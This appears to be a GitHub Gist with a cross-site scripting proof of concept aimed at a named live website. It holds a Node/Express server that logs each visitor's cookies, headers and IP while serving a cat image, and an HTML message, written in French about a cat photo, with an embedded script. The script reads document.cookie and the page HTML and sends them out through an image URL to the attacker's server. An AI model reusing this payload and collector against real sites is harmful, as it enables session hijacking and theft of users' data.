Last active
July 14, 2018 21:40
-
-
Save cchudant/78cfdf33bfbac53b3758ee15d7dab1dd to your computer and use it in GitHub Desktop.
XSS on https://ontiques.co/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const fs = require('fs') | |
| const express = require('express') | |
| const app = express() | |
| const cat = fs.readFileSync('osiris.jpg') | |
| app.get('*', (req, res) => { | |
| const a = { | |
| headers: req.headers, | |
| baseUrl: req.baseUrl, | |
| body: req.body, | |
| cookies: req.cookies, | |
| fresh: req.fresh, | |
| hostname: req.hostname, | |
| ip: req.ip, | |
| ips: req.ips, | |
| method: req.method, | |
| originalUrl: req.originalUrl, | |
| params: req.params, | |
| path: req.path, | |
| protocol: req.protocol, | |
| query: req.query, | |
| route: req.route, | |
| secure: req.secure, | |
| signedCookies: req.signedCookies, | |
| stale: req.stale, | |
| subdomains: req.subdomains, | |
| xhr: req.xhr | |
| } | |
| console.info(`METHOD=${req.method} IP="${req.ip}" URL="${req.originalUrl}" COOKIES=${JSON.stringify(req.cookies)} HEADERS=${JSON.stringify(req.headers)} INFOS=${JSON.stringify(a)}`) | |
| res.type('jpg') | |
| res.end(cat) | |
| }) | |
| const port = process.env.PORT || 3333 | |
| app.listen(port) | |
| console.log('Started on port %d!', port) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| J'avais une question de la plus haute importance. | |
| Trouvez-vous ce chat mignon ? | |
| <br><br> | |
| <img id="MONCHAT" width="400" src="https://site/imagedechat.jpg" alt="Mon chat osiris"> | |
| <script> | |
| data = { | |
| cookie: document.cookie, | |
| location: document.location.href, | |
| doc: document, | |
| body: document.body.outerHTML, | |
| head: document.head.outerHTML | |
| } | |
| document.getElementById('MONCHAT').src = `https://site/imagedechat.jpg?data=${escape(JSON.stringify(data))}` | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment